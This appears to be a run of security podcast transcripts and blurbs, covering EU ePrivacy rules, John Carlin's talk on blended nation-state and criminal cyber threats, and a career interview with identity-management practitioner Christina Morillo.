It's also really important to go back to this important theme that there are other regulations, besides the GDPR itself, to keep track of in Europe. The new ePrivacy Regulation contains some provisions targeted at the internet of things, such as the requirement to get consent from consumers from machine-to-machine transfers of communications data, which is going to be very cumbersome.
The [ePrivacy] Regulation says you have to do it, it doesn't really say how you're going to get consent, meaningful consent, that’s a very high standard in Europe, to these transfers when there's no real intelligent interface between the device and the person, the consumer who's using it. Because there are some things that have, maybe kind of a web dashboard. There's some kind of app that you use and you communicate with your device, you could have privacy settings.
There's other stuff that's much more behind the scenes with Internet of Things, where the user is not having a high level of engagement. So, maybe a smart refrigerator that's reeling information about energy consumption to, you know, the grid. Even there, you know, there's potentially information where the user is going to have to give consent to the transfer.
And it's hard to kind of imagine exactly what that interface is going to look like!
I'll mention one thing about the ePrivacy Regulation. It's in draft form. It could change, and that's important to know. It's not likely to change all that much, and it's on a fast-track timeline because the commission would like to have it in place and ready to go May, 2018, the same time as the GDPR.
IOS
Sue Foster, I'd like to thank you again for your time.
SF
You're very welcome. Thank you very much for inviting me to join you today.
Last week, when the world experienced the largest ransomware outbreak in history, it also reminded me of our cybersecurity workforce shortage. When events like WannaCry happen, we can never have too many security heroes!
There was an idea floating around that suggested individuals with a music background might have a promising future in security. The thinking is: if you can pick up music, you can also pick up technology.
The Inside Out Security panelists – Cindy Ng, Mike Thompson, Forrest Template and Mike Buckbee – are in agreement. Their sentiments expanded to all artists and added that creative thinking along with attention to detail can go a long way.
Other articles discussed:
Sue Foster is a London-based partner at Mintz Levin. She has a gift for explaining the subtleties in the EU General Data Protection Regulation (GDPR). In this first part of the interview, she discusses how US companies can get caught up in either the GDPR's extraterritoriality rule or the e-Privacy Directive's new language on embedded communication. She also decodes the new breach notification rules, and when you need to report to the DPA and consumers. Privacy and IT security pros should find her discussion particularly relevant.
Last week, John P. Carlin, former Assistant Attorney General for the U.S. Department of Justice’s (DOJ) National Security Division, spent an afternoon sharing lessons learned from the DOJ.
And because the lessons have been so insightful, we’ll be rebroadcast his talk as podcasts.
In part one of our series, John weaves in lessons learned from Ardit Ferizi, Hacktivists/Wikileaks, Russia, and the Syrian Electronic Army. He reminds us that the current threat landscape is no doubt complicated, requiring blended defenses, as well as the significance of collaboration between businesses and law enforcement.
John Carlin currently chairs Morrison & Foerster’s global risk and crisis management team.
John Carlin: The threat when it comes to what's facing our private companies has reached a level we haven't seen before. That's true for two reasons really. Some of what we're seeing on the threats are things that in the national security community that we've been monitoring for years, but we've had a change of approach. So in the past, while we were monitoring it, it would stay in classified systems. We would watch what nation states were doing or terrorist groups were doing and we didn't have any method to make it public. So one trend has been governments are starting to make public what they see in cyberspace. The second is that the actual threat itself has increased both in volume and complexity. That's been quite noticeable. In the past year alone, and really the past two years, we've seen cyber incidents that have gotten people's attention from every level. That has caused in government a shift in terms of the regulatory attention that's focused on cyber security breaches.
When I recently left government, there was almost an unholy rush across every regulatory and law enforcement agency as they realized what the scope of the threat was and how their existing regulatory or law enforcement authorities were not covering it. That caused them to do two things. One, to try to come up with creative ways to interpret existing regulatory standards so that they can impose liability in the event of a cyber breach, and second, for those who realize that no matter how creative you got, there just was no way to bring it within existing regulations, more countries around the world are adopting data breach laws than ever before, most notably, Europe coming onboard in 2018, but really it's a global phenomenon. And as part of the focus on data breach, they're also having laws that are starting to impose certain standards of care or specific security obligations. I think it's that combination of increased awareness of the threat plus an increasingly complex and potentially punitive regulatory and law enforcement environment that's made this a top-of-mind issue for C-suites in poll after poll, not just here in the United States but in countries throughout the world. It's new and they're not quite sure what the legal regulatory landscape looks like, and accordingly, it's the type of thing that keeps them up at night.
For those of you in the information technology space, that could be good news and bad news. It means more scrutiny on what you're doing but then hopefully, as we explain what it is and what can be done, it will also mean more resources. There's the old description of traditional cyber threats, and it's not like any of these have stopped, which would be crooks, nation states, activists, terrorists, everyone who wants to do something bad in the real world moving to cyberspace as we move everything that we value from analog to digital space, and the type of activity that they did ranged from economic espionage type activity to destruction of information, alteration of information, which I think is a trend that we need to watch, this is the idea of the integrity of your data may be at stake. I know, it's top-of-mind for those of us responsible for protecting against criminal and national security threats in government and fraud.
I'm not going to spend too much on those traditional buckets. I wanted to highlight two new areas of cyber threat that are here, now. One is the, what I'll call the blended threat and the second is insider threats. Let's start with the blended threat. Imagine you're back at your office, you're in your company, and you spot what looks like a relatively low-level, unsophisticated criminal hack of your system. For many of you, it wouldn't even warrant, as you handle it yourself, informing anyone in the C-suite. It would never reach that high in the company. Now imagine that as a result of that relatively unsophisticated hack, you're a trusted brand name retail company, that the bad guy has managed to steal a relatively small amount of personally identifiable information: some names, some addresses. As you know, happens as we speak to hundreds and thousands of companies across the world. So the vast majority of those companies faced with an unsophisticated hack where it looked like the IT folks had a good control over what had occurred, it would stop there, to the extent it gets reported up to the C-suite, looks like a simple criminal act and will go unreported.
The case I'm going through with you now though is a real case and what happened next was several weeks later, this company then received, through email, it was Gmail, so a commercial provider, a notice that said, "Hey, unless you wanna be embarrassed by the release of these names and addresses, you need to pay us $500 through Bitcoin." As these things go, you know, you can't really think of a dollar figure much lower than $500, asking for something through Bitcoin on a Gmail threat also does not look particularly sophisticated, you combine that with great confidence that you've been able to find them on your system and kick them off your system, again, the vast majority of companies, this does not go down as a high risk event and would not be reported. In the case that I'm discussing, which was a real case, the company did work with law enforcement and what they found out that they never would have been able to find out on their own was that what looked like a criminal act, and don't get me wrong, it was criminal, these guys wanted the $500, but it also was something else. And what it also was was it turned out that on the other end of that hack, on the other end of that keyboard was an extremist from Kosovo who had moved from Kosovo to Malaysia and located in Malaysia in a conspiracy with a partner who is still in Kosovo, he'd hacked into this U.S.-based trusted retail company, stolen these names and addresses, and in addition to the $500, he had managed, through Twitter, to befriend one of the most notorious cyber terrorists in the world at the time, a man named Junaid Hussain, who's from the United Kingdom. Junaid Hussain had moved from the United Kingdom to Raqqa, Syria where he was located at the very heart of the Islamic State of the Levant.
In my old job, I was the top national security lawyer at the Justice Department responsible for protecting against terrorists and cyber threat, and on the terror side of the arena, this guy, Junaid Hussain along with his cohort in the Islamic State of the Levant, had mastered a new way of trying to commit terrorist acts. Unlike Al Qaeda where they had trained and vetted operatives, what they were doing was crowdsourcing terror. They were using social media against us and consistent with that approach, what Junaid Hussain did is he befriended this individual who moved to Malaysia named Farizi, he communicated with him through U.S. provided technology, Twitter, he got a copy of the stolen names and addresses and then he called those names and addresses into a kill list. He distributed that kill list through Twitter back to the United States and said, totally consistent with their new approach of crowdsourcing terror, "Hey, if you believe in the Islamic State, if you're following me, kill these people," by name, by address, where they live.
That's the face of the new threat in a version of the blended threat. I think for any of you, any company, if you knew when you were dealing with the incident, where you'd seen someone breach your system, that the person who breached your system was looking to kill people with the information that they stole, that would immediately be a C-suite event, your crisis risk plans would go into place, you would certainly be contacting law enforcement. The problem with the blended threat, these guys who are both crooks on the one hand and working on behalf of a terrorist or a nation state is you don't.
Because they did work together, in this case, Farizi, the guy responsible in Malaysia, was arrested pursuant to U.S. charges, extradited after cooperation from Malaysia, pled guilty and was sentenced this past July to 20 years in Federal prison. And Junaid Hussain, who was operating in ungoverned space in Raqqa, Syria, was killed in a military strike acknowledged by Central Command. This issue that's putting your companies on the frontlines of national security threats in a way that they simply never happened before, there's not another area of threat which has the same effect, requires new approaches in terms of security and in the ways that the Federal government interacts with private companies.
Let me go through a little bit of some other examples of this blended threat phenomenon. If you think about what happened with the Wikileaks, you have Wikileaks which acts as a distributor of information but what they do is they end up, it's not necessarily the hacktivist that steals the information. So you see the breach into your system, you're not quite sure how it's gonna be used. Is it gonna be used by someone who wants to make money? Is it gonna be used as someone who has a very specific intelligence purposes? It used to be the case, certainly the assumption for those of us in government working with the private sector that if you had information stolen by a nation state, unless you had some economic espionage type issue, you really didn't need to worry about the nation-state using it against you and that's clearly no longer the case. What you see here with something like Russia and the DNC is information that is taken in one sphere then gets leveraged and used to be put out through another. So a nation state steals it and then they have this shield of Wikileaks for the distribution of the information.
You also have with Russia, we tried in terms of the blended threat, you have what look like nation state actors and let's use the most recent Justice case against the Russian actors who attacked Yahoo. What you had there were crooks, I mean, straight up crooks who were Russian who were out to make a profit, and there was an attempt at law enforcement to law enforcement cooperation and U.S. law enforcement authorities passed information to the Russians to try to hold those crooks responsible. What you get instead of cooperation, this is all laid out in the complaint, is that the Russians then signed up the crooks as intelligence assets and used them to continue to steal information and to take some of the information they'd stolen so that the guy was both making a profit on one hand but also was providing it for state purposes.
That version of the blended threat has a slight variation on it which his day job is Russian State Security Service Hacker or Chinese State Security Service hacker but there's a lot of corruption in both countries. You wanna make a buck on the side, same actor, same system, daytime working on behalf of the state, night time, looking to line their pockets with profits, what you're trying to figure out on the back end of that attack, "Hey, what type of risk am I dealing with?" It can be incredibly complicated to figure out. Am I in a national security situation or a criminal situation. And that's combined then with the deliberate blending. As we've moved toward doing attribution, you'll see state actors, whether Russian, Chinese or others, they will not use the same sophisticated tools that they used to use in the past to breach your system that were identifiable. So you can tell by the tactics, the TTP, the tactics, the techniques, the procedures that you were dealing with a state actor from Russia or China or another sophisticated state actor. Now they're using the same easily available tools that low-level crooks are using in the first instance looking to see if they can get in through human error or weaknesses in the defenses and that makes it much harder to do the attribution.
Final version of the blended threat would be Syrian Electronic Army. Now many of you may be familiar with this group. This was the group who, and, you know, it's in vogue now, everyone's talking about fake news. Well, they're the original fake news case that we did. When we prosecuted the Syrian Electronic Army, what they had done was they spoofed a terrorist attack on the White House by defacing the White House, public facing site. That was very successful and caused the loss of billions of dollars in the stock market until people realized that it was a hoax. That same group though was regularly committing ransomware type offenses, they just weren't calling themselves the Syrian Electronic Army. And so for many of your companies, you would have a policy in place that would again spot it at a high area of risk and say, "We're not gonna make a payment if we knew we were paying off the Syrian Electronic Army," or in the case of Farizi, if we knew we were paying off a terrorist, but the problem is you don't know. And as it was laid out in that complaint when we arrested one of those individuals in Germany, I don't think even their, the people operating them, running them from the Syrian Electronic Army knew that they were using the same tools on the side to make a buck.
So what lessons can you learn or how can we help protect our systems recognizing this change in threat? Well, one is as the criminal groups, as the sophisticated type of programs and vulnerabilities that you can sell on the dark web become more and more blended with nation states and terrorist groups taking advantage of them, we need to ask ourselves, "Are our defenses as blended as the threat?" And inside the company, that means making sure that we crosscut those who are responsible for preventing and minimizing the risk from a threat where it doesn't stop and say, "Hey, maybe we could build a wall that's high enough or deep enough to keep someone out," because that doesn't exist, but once they're inside and we're dealing with the actual threat, who do I have in my company who has evolved? Is there a way to make easily available to the business side so we can get their informed views as to what and how information should be protected to mitigate risk on the front end and then how to respond? And similarly, are we working together as companies and as a government with companies as the bad guys are with nation states who are sponsoring them or a terrorist group and that's where there's focus now, on figuring out a better way to do cooperation between business and law enforcement is vital.
The division I used to head, the National Security Division, we were created as one of the reforms post-September 11th and the idea was post-September 11th, we gotta get better at sharing information across law enforcement and intelligence divide. The failure to share that type of information led to the death of thousands of people on September 11th. This challenge of how to share information in terms of what the government is seeing on the threat and how to receive information is exponentially more complicated because it's not just about sharing information better within government or within your company, it's how to share information across government to the private sector and back again.
Rather than referring our weekly podcast panelists as security experts, we’re now introducing them as security practitioners. Why? A popular business article on mindset brought to our attention the perils of having self-proclaimed titles, such as experts and gurus. It signals our “thirst for knowledge in a particular subject has been quenched.” That is far from reality! Security is a constantly evolving field, with new threats and vulnerabilities. To have a fighting chance, it would behoove us to start by cultivating a curious learner mindset by asking, “Why?” and “How does this work?”
As reformed security know-it-alls, here are some of the stories we covered:
There’s been a long held stigma amongst our infosec cohort and it’s getting in the way of doing business. What’s the stigma, you ask? “Know-it-all” techies who are unable to communicate. Unfortunately, this shortcoming also puts our jobs at stake.
According to a recent cybersecurity survey, the board of directors polled said that IT and security executives will lose their jobs because of their failure to provide the board with useful, actionable information. It gets worse. More than half of board members say that the data presented is too technical.
In an effort to redeem ourselves and to understand the problem, I suggested role playing with the Inside Out Security panel – Cindy Ng, Kilian Englert, Mike Buckbee, and Kris Keyser – and to also practice speaking with executives about cybersecurity.
I presented two practical scenarios. The first prompt: explain why you might need UBA, even if you already have a SIEM tool. The other: explain the importance of keeping the health data generated from a wearable, safe and secure.
Articles discussed in our podcast:
As sleep and busyness gain prominence as status symbols, I wondered when or if good security would ever achieve the same notoriety. Investing in promising security technology is a good start. We’ve also seen an upsurge in biometrics as a form of authentication. And let’s not forget our high school cybersecurity champs!
However, as we celebrate new technologies, sometimes we remain at a loss for vulnerabilities in existing technologies, such as one’s ability to guess a user’s PIN with the phone’s sensors. I’m also alarmed with how easily you can order an attack!
If you want to be an infosec guru, there are no shortcuts to the top. And enterprise information security expert, Christina Morillo knows exactly what that means.
When she worked at the help desk, she explained technical jargon to non-technical users. As a system administrator, Christina organized and managed AD, met compliance regulations, and completed entitlement reviews. Also, as a security architect, she developed a comprehensive enterprise information security program. And if you need someone to successfully manage an organization’s risk, Christina can do that as well.
In our interview, Christina Morillo revealed the technical certificates that helped jumpstart her infosec career, described work highlights, and shared her efforts in bringing a more accurate representation of women of color in tech through stock images.
Cindy Ng So, you've been in the security space for almost 20 years, and you've seen the field transform into something that people didn't really know about. Into something that people see almost regularly on the front page news. And I wanted to go back in time and for you to tell us how you got started in the security business.
Christina Morillo: So, I actually got started in the technology industry about 18 years ago, and out of that, in security, I've been like 11 to 12 years. But I pretty much got started from the ground up while I was attending university. I actually got a job doing technical support for, at the time, compaq computers. So that's like I'm aging myself right there. But back when compaq computers were really popular, I worked for a call center, and we did 24-hour technical support. And that's where I kind of learned all of my troubleshooting skills, and being able to kind of walk someone through restarting their computer, installing an update, installing a patch, being able to articulate technical jargon, in a nontechnical format. Then from there, I moved on to doing more desktop support. I wanted to get away from the call center environment, I wanted to get away from that, and be in, like, an enterprise environment where I was the support person, so I could get that user interaction. So that's where my journey started. It feels like yesterday, but it's been a long time.
Cindy Ng It goes by quickly, and how did you get started at Swiss Re?
Christina Morillo: When I came back home from university, I am originally from New York City, I was looking for work. And I wanted to really get into financial services, doing IT within the financial services industry because I knew that would be a good strategic move for my professional career. I bumped into this recruiter, and he told me about a position at Swiss Re within their capital management investment division. And so I gave it a go even though I didn't have the experience. You know, I took a shot. And they really liked the fact that I had prior experience with active directory and networking. And since I was very much hands-on and I had just taken some Microsoft certifications, so I was like really into it. So I was able to answer the questions really efficiently, and they liked me, so they gave me the shot. That's what started me into the world of information security, and identity, and access management, and access control. I learned all my "manual foundation" I'll call it, manual fundamentals, at Swiss Re.
Cindy Ng Would you say that your deep understanding of AD was an important part of your career?
Christina Morillo: Oh, absolutely. Absolutely.
Cindy Ng And what do most sysadmins get wrong when it comes to their understanding of AD?
Christina Morillo: There is a lot to do with the whole permissioning and file structure. A lot of times people don't really go into the differences between share permissions and NTFS permissions. And it can get really complex really fast. Especially when you're learning in school, you create your environment, right? So it's very clean. But when you start at a company, you're looking at years of buildup. So you go into these environments where it's nowhere near what you learned at school. So you're just like, oh my goodness. And it becomes really overwhelming very quickly. I think it's, like, not having that deep understanding and deep knowledge, and just kind of taking short routes. Because we're very busy during the day, and there's a lot to do, right? Especially for sysadmins. They have a lot on their plates. So I think a lot of times it's like, okay, use your own backlist. Just throw them in whatever group, we'll fix it later. And later never comes. I don't fault them, but I just think that we need to be a little bit more diligent with understanding structures and fundamentals.
Cindy Ng How did you spend time figuring out how to restructure a certain group, if that was an important part in your job? In your team?
Christina Morillo: Yeah. Of course, absolutely. I always want to because it makes my life easier. But, you know, you're not always able to. And that's because, like I said, it's so complex, and there's so many layers that peeling these layers back will cause chaos. So sometimes you have to prioritize. And just from like a business perspective you have to prioritize. You know, is this something that we can do gradually or look at setting up as a project and completing it in phases, or is it high-priority, right?
And so, the first thing I do is I talk to whoever owns the group or let's say whatever specific department, like finance. So who approved access to this group? So I like to kind of determine that. And then work my way backwards. So, okay, if this is the owner of the group, then I like to say, "Who should get access to this group?" What kind of access do they need to this group? Do they need read-only access, or do they need modify access?" And then go from there. And who should be the initial members of the group? And a lot of times its a matter of having to recreate the group. So create a fresh group, add the individual users, read-write or modify, or read-only, and then migrate them into the group, and then delete the old group. Which that part can take time because you don't know what you're touching.
A lot of times people like to permission groups at different levels where they don't belong. The worst thing that can happen is you can cause an outage and you never really want that. Kind of investigating and using tools like DatAdvantage to help with the investigations to better understand what you're doing before you do it. So it's a process. I mean, I wouldn't say it's something easy. That's why, a lot of times, it's put on the back burner. But, you know, I feel like it's something that has to be done.
Cindy Ng Your next role which was at Alliance Bernstein?
Christina Morillo: So at Alliance Bernstein, that was a short-term contract. That was part of their incident response & security team. 50% of the time I was handling tickets, and, you know, approving out FTP access, and approving firewall access, and checking out scans or anti-virus scans, and making sure that our AV was up to date, and doing all that stuff.
And then the other 50% was working on identity management and, like, onboarding applications into the system and testing. And then training the team that would handle day to day support. So it's like a level two, level three. And then defining the processes. You know, onboarding the applications, defining the processes, writing the documentation, and then handing over to the support team to take over from there. So it was a lot of conversation with stakeholders, application owners, and I really appreciated being able to be a part of those processes.
That's why I started seeing more of the automation. I mean, at Swiss Re, we were very much manual for the first couple of years. Which was fantastic because, you know, although it was a pain, it was fantastic because I got to understand how to do things if the system was down. It gave me that understanding of like 'Oh, I know how to generate a manual report.' So when it came time to automate, I was like, 'Oh. Okay, this is nothing. I understand the workflow,' right? I can create a workflow quickly, or I can... I understand what we need, right? And it also helps when people are just like, "That's gonna take four days." I'm like, "Absolutely not. That's going to take you 45 minutes." So it was a great experience.
Cindy Ng Would you ever buffer in time if systems went down? I'm thinking about something like ransomware.
Christina Morillo: Thankfully, that never happened while I was at these companies. That never happened. And since it didn't hit my team, I think I've always been more on the preventative rather than being on the reactive side. A lot of times you did have to react to different situations or work in tandem with other teams, but I'm really into, like, preventative. Like, how can we minimize risk? How can we prevent this from happening? Kind of thinking out of the box that way. You have to not be an optimistic person. Like, you have to be like, well, this can happen if we leave that open. Right? And it's not even meant to sound negative, but it's almost like you have to have that approach because you have to understand what adversaries and hackers, how do they think? What would I want to do? Right? Like, if I see a door unlocked. It's almost like you're on the edge and you have to think that way, and you have to look at problems a little bit differently because, in business, you don't rank, you just want to do their work.
Cindy Ng Did you develop that skill naturally, or was it innate, or did you realize, 'Oh my God, I need to start thinking a certain way'? The business isn't gonna care about it. That's why you're responsible for it.
Christina Morillo: I think I've always had that skill set, but I think that I developed it more throughout my career. Like, added strength in that skill throughout my career. Because when you're starting, especially with network administration and sysadmin stuff, you have to be the problem solver. So you have to be on the lookout for problems. Because that's, like, your job, right? So there's a problem, you fix it. There's a problem, you fix it. So, a lot of times, just to make your job a little bit easier, you have to almost have to anticipate a problem. You have to say, 'Oh, if that window's open and if it rains, the water's gonna get in. So let's close the window before it rains!' It sounds intuitive, but a lot of times people just don't think that far ahead.
I think it's just a matter of the longer I remain in the industry, the more I see things changing. And then you just have to evolve. So you always have to think about being one or two steps ahead, when you can. And I think that skill set comes with time. You just have to prepare. And also, like, the more you know... Like, I'm very big on education and training and learning even if it's not specific to my job. I feel like it helps broaden my perspective. And it helps me with whatever work I'm doing. I'm always taking either, like, a Javascript class or some class, or just like a fun in web development class. I've been looking for a Python class. Like, I did a technical cert, like boot camp. Like, I'm preparing for a cert. But it's a lot. But I also take ad-hoc stuff. Like I'll take a calligraphy class, just to kind of balance it out. You know I'll go to different talks at the 92nd Street Y. Whether it's technology related or just, like, futurism related, or just innovation related. Or something completely different.
Cindy Ng I've read your harrowing story about taking a class at General Assembly with having kids and a husband. Oh my God, you are so amazing. It's so inspiring.
Christina Morillo: Definitely hard. But, you know, you gotta do what you gotta do. And it's a problem because when you become a parent, it doesn't mean that you lose your ambition. It just kind of goes on a temporary hold. But then you when you remember, you're like 'Oh, wait a minute. No. I have to get back to it.'
Cindy Ng So let's talk about Fitch Ratings. That role is really interesting.
Christina Morillo: Yeah, yeah. Thus far, it's been one of my favorites. Because, at Fitch, I was actually able to deploy an identity and access management platform. So, on nothing to create something completely new and just deploy it globally, right? So what that means is that I changed the HR onboarding process and offboarding process. So, like, how new-hires are added to the system. How people that are terminated are removed from the system. How employees request access to different applications. How managers approve. How authorizers approve the entire workflow. So that was amazing.
Basically, when I started, they wanted to go from pretty decentralized to a centralized model to purchase this out of the box application. They had a lot of transitions, so they needed someone to come in and own the application and say, like, "Okay, but let me implement it." It was just on a like a development server, not fully configured. So, my job was to come in, look at the use-cases, look at what they needed. At least initially. What needed to happen? How did they need to use this application? Then I needed to understand the business processes. Current things, or how do they perform this work today? Like, does the help desk do it? Does a developer give access to a specific application that they manage? What are they developed for? What happens now?
So I took time to understand all of the processes. Right? Like, I spoke to everyone. I spoke to HR. I spoke to finance. I spoke to legal. I spoke to compliance. I spoke to the help desk. I spoke to network administration. I spoke to application developers. To compile all of that information in order to better create the use-cases and the workflows, and to kind of flesh them out. Then what I did is I started building and automating these processes in that tool, on that platform.
My boss gave me... He said, "Oh, I'll give you like a year." And I was like, "Okay. Fine." But, I guess, once I got into like the thick of things, I got like really aggressive, and I really was hard with the vendor. Because I was a team of one. You know, I had support from our internal app team, and network administration team, and the sysadmins. But I completely owned the process, and owned the applications, and owned building it out. So I rode the vendor like crazy just to get this done, and understand, and just to look at it from top-bottom, bottom-to-top. And we were able to deploy it in five months.
You know, I got them from sending emails and creating help desk tickets, to fully automated system, onboarding, offboarding, and requesting entitlements. But more importantly, I was able to get people on board. Because that's one of the other big things that you don't really discuss. A lot of times we got a lot of pushback. While what we do is extremely important, especially in security, and sometimes we're not the ones that are the most liked. People are afraid, right? So it's also about developing new relationships with your constituents, with the users, right? And helping them understand that you're not trying to make their lives miserable, you're just getting them on board. I think that also takes skill. It takes finesse. It takes being able to speak to people, relate to people. And also, it takes being able to listen at scale. Right? So you have to listen to understand.
You know, I think if a lot of us did more listening and less talking, we would definitely understand where people are coming from and be able to kind of come up with solutions. I mean, you're not always gonna make people happy. Maybe some of the time. Not all of the time. But at least you've communicated, and they can respect you for that. Right? So I was able to get pretty much the entire company on board. And to welcome this tool that they had heard about for so long. And they weren't hesitant. To the point where I couldn't get them to leave me alone about it.
Cindy Ng You were able to help them realize that you're still able to do your work, but to do it securely.
Christina Morillo: And better.
Cindy Ng When you say scared and concerned, what were they worried about?
Christina Morillo: When you say the word "automation," the main worry is that people are gonna lose their jobs. When someone says, "Oh, I heard that the tool will allow you to onboard a user.' People won't need to call the help desk anymore for that or won't need help with that. Then you're taking away like a piece or a portion of their work that may affect their productivity. And if it affects their productivity, it will affect the money that the team or the department gets. If that happens, then, obviously, we don't need ten help desk people. We only need five. Right?
So, pretty much, it's like fear of losing their jobs or fear that they're becoming obsolete. So that's usually the biggest one. And also when there's, like, a new person coming in asking you how do you do your work, what is the process, that's kind of scary. "Why do you want to know? Are you taking over? Are you trying to take away my work?" You're always going to get push back. I think that's part of the job, especially when you're in security. You're just always going to. And, you know, people fear what they don't understand. So that's part of it too.
Cindy Ng Let's talk about Morgan Stanley now. So at this point, you're at a really more strategic level where you're really helping entire teams managing risk?
Christina Morillo: Yeah. So while I was at Fitch and, you know, while I loved it, it became more of a sysadmin type of role. So I decided to begin looking for my next opportunity. And Morgan Stanley came up with that summer. And I looked at it as, well, this is a great opportunity for me to be at a more strategic level and understand, become a middleman, right? Almost like a business analyst where I'm understanding what the business needs and the kind of liaising on the technology side. So I thought it would be a good opportunity for me to hone that skill set on the business side and look at values opposition. But also because of my technical background, I'll be able to communicate with and get things done on the tech side.
So that was amazing. I mean, I learned a lot about how the business and IT engage. What's important, and how to present certain, I guess, calls for action. Like, if you need something done, like, oh, you implement a new DLP solution. Are you solving a problem for the business or are you solving a problem for technology? Understanding the goal. Understanding your approach. And looking at things two ways. Looking at how to resolve a problem tactically. How can we resolve this issue today? And then what is the strategic or long-term solution? So a lot of business-speak, a lot of how to present.
I think I would almost equate it to... My time at Morgan Stanley... And I'm no longer at Morgan Stanley, actually. But my time at Morgan Stanley I equated to getting a mini-MBA because it really prepared me and allowed me to think differently. I think, you know, when you're in technology you tend to stay in your tech cocoon. And that's all you want to do and talk about. But understanding how others think about it, even how project managers engage with a business. The business is just thinking about risk, and how to minimize risk, and how they can do their jobs and make money. Because, at the end of the day, that's what the goal is, right? Yeah, it allowed me to understand that. Whereas normally, on the tech side, I never really had to deal with that or face it. So I didn't think about it. But at Morgan, you have to think about it, and you have to create solutions around it.
Cindy Ng Also, IT’s often seen as, a cost center rather a money generator.
Christina Morillo: I've always had an issue with that. Even though IT, like, we're seen as a cost center, without us... And I'm biased, obviously... But I feel like without us, you wouldn't be able to function. At the end of they day, are we generating money? I think so. But then it goes into that whole chicken or the egg thing. But that's my argument, and I guess I'm biased. I've always been in IT, right?
Cindy Ng What's most important to business? Is it always about the bottom line? For IT people, its always about security and minimizing risk.
Christina Morillo: It is about the bottom line. There are many avenues to get to there more efficiently, or just a little bit smarter. It's like working smarter. But I think one of the ways is by listening at scale. Just like if you're starting a company, you're providing a service, you need to understand who your target market is, right? You need to understand what they want and why they want it. And that's how you know what service you can provide or how you can tailor your needs to them. Why? Because then they will buy it from you, or they will seek services from you. And what does that mean? That means you get to collect that money.
And sometimes you need, like, a neutral group. You know? Like a working group. I realized they have a lot of working groups. So a lot of discussion. Sometimes that can be good and bad, but I see it as more of a positive thing. And the reason why is because you need to be able to hear from both sides, right? Both sides need to be able to express themselves, and everyone needs to be one the same page or get to that same page somehow. You need to understand what I need as a business user. I need to be able to book a trade, or I need to be able to do this, and I need to do it in this amount of time. Now how can you help me? And then the IT person, or the security person, whoever needs to be able to say, "Okay. Well, this is what I can do, this is what I cannot do right now. But maybe this is what I can do in the future."
Again, it goes back to that we are problem solvers. So we're all about solutions and how to keep the business afloat and keep the business running and operating. That's our job. We're not there to say we have to do it this way. That's not what we're there for. So I think it's also understanding what role everyone plays, and understanding that we all have to kind of like work together to get to that common goal.
Let's say we have a working group about implementing Varonis DataPrivilege globally, right? So then you have stakeholders from every department, or every department that it would touch. So if that means if that the security team is going to be involved, we have a representative from the security team. If that means that the project management who's managing the project is gonna be involved, we have someone from that team. So you pretty much have a representative from each team that it will affect. Including the business, at times, so that they're aware of what's going on. And then you have status updates on what's going on. What do we need? Where are the blocks and the blockers? And people get to speak, and people get to brainstorm, and you get to bring up problems, and what you need from the other team, what they need from you. And it just helps with getting projects moving and getting things going quickly and just more efficiently without anyone feeling like they weren't represented in the decision-making process. It also speaks to that as well.
Cindy Ng Before our initial conversation, I had no idea that you used DatAdvantage.
Christina Morillo: My last employer, they used DatAdvantage, and were also implementing portions of DataPrivilege. The company before that, Fitch, we used DatAdvantage heavily. So, like, recording. You know, it's been a couple of years, so I don't know if they still use the tool. But I know when I was there, I actually used it for reporting purposes, and to help me generate reports, and just do, like, investigations, and other rule-based stuff.
Cindy Ng Was it helpful for, like, SOX compliance?
Christina Morillo: Yeah. Yeah, especially when whether it was internal or external audits, we always got the call. Like, "Can you come and give me access to this group on such and such date?" or, "Can you come and get this removed?" or, "Can you tell me this?" Just weird ad-hoc requests. That makes sense, right? But at the time, you're like, 'Why did you need this?' Being able to kinda quickly generate the report was, like, super helpful.
Cindy Ng And finally, I love what you do with the Women of Color in Tech chat.
Christina Morillo: Yeah, yeah. A friend of mine, Stephanie Morillo...no relation, just same last name...but we both work in tech. And in 2015, we decided to co-found a grassroots initiative to help other women of color, and non-binary folks and just under-represented people in technology to have a voice, a community. We started off as Twitter chats. So we would have weekly, bi-weekly Twitter chats. Just have conversations, conversations with the community.
And then we started getting contacted by different organizations. So they wanted to sponsor some of our community members to attend conferences, and just different discussions and meetups and events. So we started to do that. We also did, like, a monthly job newsletter, where companies, like Twitter and Google, they contacted us. Then we worked with them. We kind of posted different positions they were recruiting for and shared it directly with our community.
And then, the thing we're most known for is the Women of Color in Tech stock photos, which basically is a collection of open-source stock photos featuring women and non-binary folks of color who work in technology. So those photos, the goal was to give them out for free, open-source them, so people that can have better imagery, right? Because we felt that that representation mattered. The way that that came about was when I was building the landing page for the initiative, I realized that I couldn't find any photos of women who like me who work in technology. And it made me really upset. Right? And so that activated... I feel like that anger activated something within me, and maybe it came as a rant. Like, I was just, like, "Okay, Getty, don't you have photos of women in tech who look like me?" Why is every... Whether white or Asian or whoever... Why is any... And I see a woman with a computer or an iPad, it looks like she's playing around with it. Those are the pictures that I was seeing. This is not what I do. This is not what I've done. So I just felt like I wasn't represented. And then if I wasn't represented, countless of other folks weren't as well.
I spoke to a photographer friend of mine who also works in tech. And he started like his side passion stuff. So he agreed, and we just kind of started out. I mean, we went with the flow. It turned out amazing. And we released the photos. We open sourced them, and we got a lot of interest, a lot of feedback, a lot of features, a lot of reporting on it. And we decided to go for another two rounds. You know, a lot of companies we talked to were like, "We want to be a part of this. This is amazing. How can we support you?" So a lot of great organizations. If you look at the site, you see of those organizations that sponsored the last two photo shoots.
We released the collection of over 500 photos. And we've seen them everywhere, from Forbes, Wall Street Journal. It's like I've seen them everywhere. They're just, like, all over the web. Some of our tech models have gotten jobs because they started conversations. Like, "Wait, weren't you in the Women of Color in Tech photos?" "Yeah, that's me!" Whatever. Some people have gotten stopped, like, "Wait a minute, you're in this photo." Or they get tags. They've been used at conferences. Some organizations are now using them as part of their landing pages. They're like all over the place. And that was the goal.
But it really, you know, makes us really happy. But just seeing photos all over the place, and the fact that people recognize that those are our photos, it was just amazing. We actually open sourced our process as well. We released an article that spoke about how we got sponsors, what we did, in hopes that other people, other organizations would also get inspired and replicate the stock photos. But we also get inquiries about, you know, "Are you gonna have another one? Can you guys have another one?" So it's up in the air. I'm debating it. Maybe.
It was only last week that we applauded banks for introducing cardless ATMs in an effort to curb financial fraud. But with the latest bank heists, it may help to turn up the offense and defense. Why? Hackers were able to drill a hole, connect a wire, cover it up with a sticker and the ATM will automatically and obediently dispense money. Another group of enterprising hackers changed a bank’s DNS, taking over their website and mobile sites, redirecting customers to phishing sites.
